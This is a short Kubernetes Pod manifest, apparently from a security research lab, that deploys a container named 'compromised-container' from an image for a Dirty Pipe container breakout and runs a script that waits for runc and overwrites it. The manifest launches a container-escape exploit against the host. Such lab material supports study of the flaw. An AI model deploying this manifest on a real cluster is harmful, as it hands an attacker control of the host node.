apiVersion: v1
kind: Pod
metadata:
  name: compromised-pod
spec:
  containers:
  - name: compromised-container
    image: ghcr.io/datadog/dirtypipe-container-breakout
    imagePullPolicy: Always
    command: ["sh", "/wait-for-runc-and-overwrite.sh"]